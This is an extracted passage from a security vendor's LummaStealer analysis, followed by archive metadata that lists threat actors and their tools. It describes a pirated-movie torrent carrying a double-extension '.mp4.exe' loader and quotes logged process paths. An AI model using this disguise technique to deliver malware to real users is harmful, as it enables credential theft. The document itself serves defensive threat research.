the infection chain depends on user interaction, prevention must emphasize user awareness, behavioral\r\nmonitoring, and rapid response to credential compromise.\r\nEndpoint detection strategies should focus on identifying anomalous process chains, living-off-the-land binary\r\nabuse, and suspicious network behavior associated with loader activity.\r\nAs LummaStealer continues to adapt, defenders must assume that initial access will increasingly resemble\r\nlegitimate user behavior. Understanding the social engineering context, delivery ecosystem, and post-compromise\r\nimpact is therefore essential for detecting, mitigating, and ultimately reducing the effectiveness of LummaStealer\r\nand similar infostealer operations.\r\nYou can check out the complete list of IoCs on GitHub.\r\nSource: https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nhttps://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader\r\nPage 17 of 17\n\n https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader \n1. Initial Access: The user downloads a torrent that promises a newly released movie in an archive. The user\nopens the archive and double-clicks the \"movie\" file. \nexplorer.exe -\u003e Command: \"C:\\Program Files\\WinRAR\\WinRAR.exe\" \"D:\\TORRENT\\Mission Impossible. Final Reckoning.\n2. Execution: The \"movie\" file is a Windows executable and it has a double extension .mp4.exe. Instead of\nplaying a movie it will run on the system. Double-clicking it from an archive will extract it in the current user's\n%TEMP% folder and execute it from there. \nProcess: \\Device\\HarddiskVolumeX\\Users\\anonymized_user\\AppData\\Local\\Temp\\Rar$EXa14612.44616\\Mission Impossible\n3. Installation: The executable is an installer and it writes the resources to the filesytem under a random name\n(e.g. Pros) \n Page 11 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader" ], "report_names": [ "lummastealer-second-life-castleloader" ], "threat_actors": [ { "id": "8a13b9be-e36d-4d48-9d19-5c93a62f862f", "created_at": "2026-03-08T02:00:03.472285Z", "updated_at": "2026-04-10T02:00:03.982274Z", "deleted_at": null, "main_name": "GrayBravo", "aliases": [ "TAG-150" ], "source_name": "MISPGALAXY:GrayBravo", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439016, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/48cf1e3184bbb2af724a60fabfd0a6f2a6cb75c5.pdf", "text": "https://archive.orkl.eu/48cf1e3184bbb2af724a60fabfd0a6f2a6cb75c5.txt", "img": "https://archive.orkl.eu/48cf1e3184bbb2af724a60fabfd0a6f2a6cb75c5.jpg" } }